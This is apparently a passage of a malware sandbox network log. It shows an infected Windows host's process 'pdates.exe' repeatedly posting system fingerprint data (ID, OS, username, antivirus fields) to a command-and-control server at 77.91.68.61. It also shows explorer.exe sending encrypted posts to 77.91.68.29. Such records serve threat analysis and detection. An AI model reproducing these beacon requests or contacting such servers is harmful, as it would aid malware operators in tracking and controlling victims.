Jul 27, 2023 01:34:45.545176029 CEST	4002	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:45.595911980 CEST	4002	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:45 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
391	192.168.2.5	50111	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:45.754368067 CEST	4003	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:45.803035021 CEST	4003	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:45 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
392	192.168.2.5	50112	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:45.964154959 CEST	4004	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:46.013082981 CEST	4004	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:45 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
393	192.168.2.5	50113	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:46.177618027 CEST	4005	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:46.224967003 CEST	4005	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:46 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
394	192.168.2.5	50114	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:46.382042885 CEST	4006	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:46.431843996 CEST	4006	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:46 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
395	192.168.2.5	50115	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:46.605561018 CEST	4007	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:46.654166937 CEST	4007	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:46 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
396	192.168.2.5	50116	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:46.814244032 CEST	4008	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:46.863979101 CEST	4008	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:46 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
397	192.168.2.5	50117	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:47.057096004 CEST	4009	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:47.106935024 CEST	4009	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:47 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
398	192.168.2.5	50118	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:47.296966076 CEST	4010	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:47.346755981 CEST	4010	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:47 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
399	192.168.2.5	50119	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:47.522744894 CEST	4010	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:47.571917057 CEST	4011	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:47 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.5	49720	77.91.68.29	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:00.055062056 CEST	520	OUT	POST /fks/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dmivtlj.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 323 Host: 77.91.68.29
Jul 27, 2023 01:33:00.055095911 CEST	520	OUT	Data Raw: 14 6d 14 7d 43 65 17 82 ff 74 d1 57 05 d3 11 27 47 f5 86 50 b8 14 19 46 ea 98 34 d4 f5 de bb e7 e5 a8 44 c8 bf ff 64 d4 77 01 7d b1 74 f5 59 fb 08 ff e2 b6 02 7a b6 b5 08 2d 62 7f 1f e1 68 05 94 04 50 e7 29 af a2 d5 f3 c9 39 df 28 fc f1 3b 93 70 Data Ascii: m}CetW'GPF4Ddw}tYz-bhP)9(;p"vIWr9dl#kkof_~ &j( Z[Yts4%^m9y$*]!f\|:9i4Z]N7]5W#PNF2_>rof]A6{b6rl=YhD=k%b
Jul 27, 2023 01:33:00.106507063 CEST	521	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Jul 2023 23:33:00 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 403 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 37 37 2e 39 31 2e 36 38 2e 32 39 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 77.91.68.29 Port 80</address></body></html>
Jul 27, 2023 01:33:00.149327040 CEST	521	OUT	POST /fks/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://liwhncy.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 239 Host: 77.91.68.29
Jul 27, 2023 01:33:00.149466991 CEST	521	OUT	Data Raw: 14 6d 14 7d 43 65 17 82 ff 74 d1 57 05 d3 11 27 47 f5 86 50 b8 14 19 46 ea 98 34 d4 f5 de bb e7 e5 a8 44 c8 bf ff 64 d4 77 01 7d b1 74 f5 59 fb 08 ff e2 b6 02 7a b6 b5 08 2d 62 7f 1f e1 68 05 94 04 50 e7 28 af a3 d5 f3 c9 38 df 28 fc 91 5c bf 4c Data Ascii: m}CetW'GPF4Ddw}tYz-bhP(8(\L'qU^\m<=J.@Em,4x8ZBduDAJ+{=?k'(_+Aw_Cj"MsI^8KXnixfK4.Elqn8oq0o
Jul 27, 2023 01:33:00.197571039 CEST	522	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Jul 2023 23:33:00 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 48 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 00 00 87 48 0e 3e 83 15 b2 bb 39 c8 39 c3 24 4a 59 cd fb c7 0b fb 57 b6 e0 74 61 82 c9 45 a6 8d 33 9d a0 71 5e f0 0f ac 02 7a 98 09 cc e8 60 b1 Data Ascii: H>99$JYWtaE3q^z`

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
40	192.168.2.5	49757	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:11.769758940 CEST	2885	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:11.820856094 CEST	2885	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:11 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
400	192.168.2.5	50120	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:47.773786068 CEST	4011	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:47.821703911 CEST	4012	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:47 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
401	192.168.2.5	50121	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:48.000956059 CEST	4012	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:48.049355984 CEST	4013	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
402	192.168.2.5	50122	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:48.219430923 CEST	4013	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:48.268186092 CEST	4014	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
403	192.168.2.5	50123	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:48.425925970 CEST	4014	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:48.473753929 CEST	4015	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
404	192.168.2.5	50124	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:48.627976894 CEST	4015	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:48.677004099 CEST	4016	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
405	192.168.2.5	50125	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:48.832353115 CEST	4016	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:48.881613970 CEST	4016	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
406	192.168.2.5	50126	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:49.059067011 CEST	4017	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:49.106508017 CEST	4017	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:49 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
407	192.168.2.5	50127	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:49.287487030 CEST	4018	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:49.336534023 CEST	4018	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:49 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
408	192.168.2.5	50128	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
